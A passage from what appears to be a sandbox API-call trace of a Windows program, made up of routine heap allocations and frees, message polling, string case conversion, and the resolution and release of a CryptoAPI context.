(HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0087.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0087.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0087.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0087.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0087.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0087.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0087.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0087.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0087.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0087.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0087.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0087.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0087.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0087.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0087.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0087.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0087.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0087.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0087.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0087.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0087.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0087.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0087.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0087.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0087.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0087.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0087.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0087.916] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0087.916] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0087.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0087.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0087.916] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0087.916] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0087.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0087.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0087.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0087.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0087.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0087.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0087.926] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0087.926] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0087.926] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0087.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0087.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0087.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0087.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0087.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0087.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0087.926] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0087.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0087.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0087.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0087.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0087.926] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0087.926] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0087.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0087.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0087.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0087.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0087.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0087.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0087.926] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0087.926] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0087.926] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0087.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0087.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0087.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0087.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0087.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0087.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0087.927] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0087.927] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0087.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0087.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0087.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0087.927] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0087.927] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0087.927] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0087.927] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0087.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6ea0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0087.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0087.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0087.927] GetProcAddress (hModule=0x76390000, lpProcName="CryptReleaseContext") returned 0x763afbc0 [0087.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0087.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0087.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0087.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0087.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.928] CryptReleaseContext (hProv=0x9961a8, dwFlags=0x0) returned 1 [0087.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74958 [0087.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a00 [0087.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0087.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0087.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0087.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0087.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0087.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0087.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0087.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0087.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0087.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0087.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0087.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0087.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0087.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0087.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0087.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0087.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0087.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0087.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0087.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0087.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0087.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0087.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0087.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0087.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0087.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0087.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0087.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0087.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0087.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0087.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0087.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0087.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0087.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0087.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0087.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0087.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0087.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0087.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0087.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0087.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74958 | out: hHeap=0x2af0000) returned 1 [0087.929] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0087.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0087.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0087.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0087.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0087.929] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0087.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0087.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0087.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99a0 [0087.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0087.929] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0087.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0087.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0087.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0087.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0087.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0087.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0087.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0087.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0087.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0087.930] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0087.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0087.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0087.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0087.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0087.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0087.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0087.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0087.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0087.930] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0087.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0087.930] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0087.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0087.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0087.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0087.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0087.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0087.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0087.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0087.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0087.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0087.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0087.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0087.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0087.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0087.930] FreeLibrary (hLibModule=0x76390000) returned 1 [0087.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0087.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0087.931] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0087.931] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0087.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0087.931] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0087.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0087.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0087.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7020 [0087.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0087.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0087.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0087.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0087.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0087.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0087.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0087.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0087.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0087.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7020 | out: hHeap=0x2af0000) returned 1 [0087.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0087.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0087.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0087.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9688 [0087.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9790 [0087.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9808 [0087.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0087.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9820 